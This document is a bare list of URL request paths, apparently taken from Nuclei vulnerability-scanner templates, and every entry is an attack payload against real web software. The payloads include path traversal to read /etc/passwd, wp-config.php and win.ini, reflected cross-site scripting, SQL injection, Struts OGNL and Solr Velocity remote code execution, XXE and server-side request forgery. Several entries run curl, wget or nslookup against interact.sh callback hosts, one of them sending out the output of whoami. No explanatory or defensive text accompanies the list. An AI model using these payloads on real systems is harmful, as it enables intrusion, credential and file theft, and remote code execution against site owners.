"/solr/%7B%7Bcore%7D%7D/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2Fcadgqm02toabu64p21o0ckqiumyyfogtn.interact.sh%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser",
"/wp-content/plugins/w3-total-cache/pub/sns.php",
"/jolokia/read%3Csvg%20onload=alert(document.domain)%3E?mimeType=text/html",
"/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/maint/modules/home/index.php?lang=english%7Ccat%20/etc/passwd",
"/wp-login.php",
"/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php",
"/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x'%2Balert(1)%2B'x",
"/wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(%22id%22)')%7D",
"/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://cadgqm02toabu64p21o0ckoy7teyjce6y.interact.sh",
"/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E",
"/%7B%7Bslug%7D%7D/?a"><script>alert(document.domain)</script>",
"/api/timelion/run",
"/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00",
"/upload",
"/data/autosuggest-remote.php?q=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E",
"/control/stream?contentId='%5C%22%3E%3Csvg/onload=alert(xss)%3E",
"/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00",
"/redfish/v1/SessionService/ResetPassword/1/",
"/sample-apps/hello/%2F/",
"/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/_snapshot/test",
"/goform/setSysAdm",
"/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php",
"/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s",
"/concat?/%2557EB-INF/web.xml",
"/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=",
"/webmail/old/calendar/minimizer/index.php?style=...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2F...%2F.%2Fetc%2Fpasswd",
"/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php",
"/web.config.i18n.ashx?l=nuclei&v=nuclei",
"/maint/modules/home/index.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00english",
"/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/pandora_console/ajax.php?page=../../../../../../etc/passwd",
"/pentaho/api/userrolelist/systemRoles?require-cfg.js",
"/dfsms/",
"/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00",
"/Images/Remote?imageUrl=http://cadgqm02toabu64p21o0ckof1eaym8yqh.interact.sh",
"/cgi-bin/awstats/awredir.pl?url=example.com",
"/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log",
"/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=",
"/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/download/C%3A%2Fwindows%2Fsystem.ini",
"/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings%5Bsource_file%5D=../../../wp-config.php",
"/infusions/downloads/downloads.php?cat_id=$%7Bsystem(ls)%7D",
"/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2A6ShpF9WQ3s2XlWG1zeTZydxj0.svg",
"/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains",
"/secure/ViewUserHover.jspa",
"/api/content/",
"/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com');alert(/2A6ShpKRDoAFXOqCqSec1USMLKq/);marmoset.embed('a",
"/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/assets/app/%7B%7Bid%7D%7D/services/AppModule.class/",
"/log/view?filename=/windows/win.ini&base=../../../../../../../../../../",
"/axis2/axis2-admin/login",
"/fcgi-bin/wgsetcgi",
"/secure/QueryComponent!Default.jspa",
"/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg",
"/_snapshot/test/backdata%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/phpmyadmin/setup/index.php?page=servers&mode=test&id=%22%3E'%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/sitecore/shell/ClientBin/Reporting/Report.ashx",
"/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility",
"/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url'%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/webapp/?fccc'%5C%22%3E%3Csvg/onload=alert(xss)%3E",
"/api/userrolelist/systemRoles?require-cfg.js",
"/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00",
"/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0D%0A)%3B//%22%22%3E%3Cdiv%3Ex%0D%0A%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E",
"/session/create",
"/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00",
"/service/v1/service-details",
"/wp-content/plugins/easy-wp-smtp/",
"/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00",
"/getFavicon?host=http://cadgqm02toabu64p21o0cko5x6yyq5zro.interact.sh",
"/index.php?option=com_jejob&view=../../../../../../etc/passwd%00",
"/struts2-rest-showcase/orders/3",
"/wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=%22onmouseover=alert(document.domain)/",
"/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini",
"/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/carbon/generic/save_artifact_ajaxprocessor.jsp",
"/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00",
"/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E",
"/solr/%7B%7Bcore%7D%7D/dataimport?indent=on&wt=json",
"/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld",
"/client/index.php",
"/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/elfinder/elfinder-cke.html",
"/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1",
"/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00",
"/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/passwordrecovered.cgi?id=nuclei",
"/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd",
"/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en",
"/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?Express=aaaa&autoEscape=&defaultFilter=e');var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require('child_process').exec('wget%20http://cadgqm02toabu64p21o0cko8ndyymxjg6.interact.sh');//",
"/wlsecurity.html",
"/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0A@GrabResolver(name='test',%20root='http://aaa')%0A@Grab(group='package',%20module='vulntest',%20version='1')%0Aimport%20Payload;",
"/invoker/EJBInvokerServlet/",
"/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF",
"/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini",
"/?class.module.classLoader.resources.context.configFile=https://cadgqm02toabu64p21o0ckteznaytazsc.interact.sh&class.module.classLoader.resources.context.configFile.content.aaa=xxx",
"/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample",
"/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;",
"/index.php?appservlang=%3Csvg%2Fonload=confirm('xss')%3E",
"/wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(document.domain)+x%3D",
"/v1/backend1",
"/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls%5B%5D=%3Cimg%20src=x%20onerror=alert(document.domain)%3E",
"/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=(SELECT%20CONCAT(CONCAT(CHAR(126)%2C(SELECT%20SUBSTRING((ISNULL(CAST(db_name()%20AS%20NVARCHAR(4000))%2CCHAR(32)))%2C1%2C1024)))%2CCHAR(126)))",
"/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd",
"/api/user/%7B%7Bid%7D%7D",
"/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00",
"/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg",
"/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/includes/mysql2i/mysql2i.func.php",
"/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd",
"/plugin",
"/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password",
"/cgi-bin/mainfunction.cgi",
"/?url=http://example.com",
"/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd",
"/webEdition/showTempFile.php?file=../../../../etc/passwd",
"/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini",
"/Assets/temp/hotspot/img/logohotspot.txt",
"/wp-content/uploads/wp-security-audit-log/failed-logins/",
"/index.action?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3D%23res.getWriter(),%23s%3Dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3D%23s.hasNext()%3F%23s.next()%3A%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd",
"/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%3Cp%20class=%22&p=1",
"/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd",
"/rapi/filedownload?filter=path:%2Fetc%2Fpasswd",
"/ebook/bookPerPub.php?pubid=4'",
"/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E",
"/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin",
"/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd",
"/index.php/%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E?page=HOME",
"/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc",
"/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00",
"/dati/availability_tpl.php?num_app_tipo_richiesti1=%22%3E%3Cscript%3Ejavascript:alert('XSS')%3C/script%3E",
"/tools.cgi",
"/seo/seopanel/login.php?sec=forgot",
"/tests/generate.php",
"/names.nsf/People?OpenView",
"/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/uploads/elfinder/elfinder-cke.html",
"/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&",
"/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd",
"/agc/vicidial_mysqli_errors.txt",
"/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00",
"/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert(123)%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13",
"/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22nslookup%20cadgqm02toabu64p21o0cko9mxyyoysso.interact.sh%22)%7D__::.x/",
"/www/delivery/lg.php?dest=http://example.com",
"/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php",
"/api/v1/method.callAnon/sendForgotPasswordEmail",
"/fhem/FileLog_logWrapper?dev=Logfile&file=%2Fetc%2Fpasswd&type=text",
"/index.action?redirect:$%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'sh','-c','id'%7D)).start(),%23b%3D%23a.getInputStream(),%23c%3Dnew%20java.io.InputStreamReader(%23b),%23d%3Dnew%20java.io.BufferedReader(%23c),%23e%3Dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
"/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert(document.domain)%3B%3C%2Fscript%3E%3C%22",
"/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00",
"/redfish/v1/SessionService/Sessions/",
"/catalog.php?filename=../../../../../../../../../etc/passwd",
"/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00",
"/wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action",
"/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd",
"/fw.login.php?apikey='UNION%20select%201,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';",
"/?qtproxycall=http://cadgqm02toabu64p21o0ckoo7xyypeqfn.interact.sh",
"/login.action?redirect:$%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'sh','-c','id'%7D)).start(),%23b%3D%23a.getInputStream(),%23c%3Dnew%20java.io.InputStreamReader(%23b),%23d%3Dnew%20java.io.BufferedReader(%23c),%23e%3Dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D",
"/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00",
"/CMSPages/GetDocLink.ashx?link=https://example.com/",
"/index.asp",
"/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00",
"/cgi/cal?year=2021%3C/title%3E%3Cscript%3Ealert('2A6Shy3VAExp0JdQzyjyUYT011v')%3C/script%3E",
"/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8",
"/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/menu/neo",
"/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00",
"/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1",
"/log/view?filename=/etc/passwd&base=../../../../../../../../../../",
"/public/login.htm?type=requests",
"/iwc/idcStateError.iwc?page=javascript%3Aalert(document.domain)%2F%2F",
"/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd",
"/ajax/networking/get_netcfg.php?iface=;curl%20http://cadgqm02toabu64p21o0ckqwxueyfg3pg.interact.sh/%60whoami%60;",
"/api/external/7.0/system.System.get_infos",
"/test.cgi",
"/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D",
"/admin.back%3Cimg%20src=x%20onerror=alert(document.domain)%3E",
"/XMLCHART",
"/wp-json/wp/v2/posts",
"/orders/3",
"/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/module/ph_simpleblog/list?sb_category=')%20AND%20false--%20-",
"/api/experimental/test",
"/pages/templates2/viewpagetemplate.action",
"/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://cadgqm02toabu64p21o0ckq1a4yyrtyes.interact.sh",
"/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php",
"/index.php/System/MailConnect/host/cadgqm02toabu64p21o0ckozn1oypi6rn.interact.sh/port/80/secure/",
"/analytics/saw.dll?bieehome&startPage=1",
"/wp-content/uploads/workreap-temp/2A6Shrur7UpNyKdlV9y9MQS10Bs.php",
"/gsearch.php.en?prod=';prompt%60document.domain%60;//",
"/pandora_console/attachment/pandora_chat.log.json.txt",
"/~user/%0D%0ASet-Cookie:crlfinjection",
"/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/",
"/index.php?p=banlist&advSearch=0'%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&advType=btype",
"/admin/post-avehical.php",
"/base_import/static/c:/windows/win.ini",
"/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23",
"/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd",
"/wan.htm",
"/code?dag_id=example_passing_params_via_test_command",
"/include/makecvs.php?Event=%60wget%20http%3A%2F%2Fcadgqm02toabu64p21o0ckoky7oym988h.interact.sh%60",
"/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd",
"/jkstatus",
"/osm_tiles/REGISTER.cmd",
"/plugins/servlet/gadgets/makeRequest",
"/wp-content/plugins/canto/includes/lib/detail.php?subdomain=cadgqm02toabu64p21o0ckp95daybtw7k.interact.sh",
"/run",
"/include/nuclei.txt",
"/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1",
"/wiki/pages/createpage-entervariables.action",
"/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml(0x23,concat(1,md5(8888)),1)",
"/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd",
"/resource/file%3A///etc/passwd/",
"/api/v1/repos/search?q=')%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09('%25'='",
"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession",
"/solr/%7B%7Bcore%7D%7D/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x='')+%23set($rt=$x.class.forName('java.lang.Runtime'))+%23set($chr=$x.class.forName('java.lang.Character'))+%23set($str=$x.class.forName('java.lang.String'))+%23set($ex=$rt.getRuntime().exec('curl%20http://cadgqm02toabu64p21o0ckohcteyxj4zh.interact.sh'))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+%5B1..$out.available()%5D)$str.valueOf($chr.toChars($out.read()))%23end",
"/wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22",
"/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
"/password_change.cgi",
"/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd",
"/webadmin/script?command=%7C%20nslookup%20cadgqm02toabu64p21o0ckqbr1ayb3n5g.interact.sh",
"/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00",
"/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/auth/newpassword",
"/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd",
"/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv",
"/config/getuser?index=0",
"/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/2A6ShuHFkhFnaDUdXLLWQob91Fd/)%3B%3C%2Fscript%3E%3C",
"/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..%5C..%5C..%5Cwindows%5Cwin.ini",
"/lumis/portal/controller/xml/PageControllerXml.jsp",
"/proxy.stream?origin=http://cadgqm02toabu64p21o0ckpt35yyyqtiw.interact.sh",
"/...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini",
"/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%3Cb",
"/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+",
"/fw/mindex.do?url=./WEB-INF/web.xml%3F",
"/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/invoker/JMXInvokerServlet/",
"/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini",
"/services/user/values.xml?var=STATUS",
"/wp-json/acf/v3/options/a?id=active&field=plugins",
"/apisix/admin/routes",
"/zabbix/setup.php",
"/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..",
"/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==",
"/wp-admin/options-general.php?page=smartcode",
"/wp-content/bps-backup/logs/db_backup_log.txt",
"/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00",
"/AvalancheWeb/image?imageFilePath=C:/windows/win.ini",
"/api/config",
"/oauth/authorize?response_type=$%7B13337*73331%7D&client_id=acme&scope=openid&redirect_uri=http://test",
"/nuclei.txt",
"/services/pluginscript/..;/..;/",
"/setup/index.php?page=servers&mode=test&id=%22%3E'%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E",
"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release",
"/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00",
"/wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd",
"/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00",
"/?post_type=post&s=%22%3E%3Cscript%3Ealert(/2A6ShtAd9jFU21ebK0XYlLyyfEC/)%3C/script%3E",
"/ui/vropspluginui/rest/services/getvcdetails",
"/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00",
"/searchblox/servlet/FileServlet?col=9&url=/etc/passwd",
"/jkstatus;",
"/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00",
"/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E",
"/login?next=%5C%5C%5Cexample.com",
"/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd",
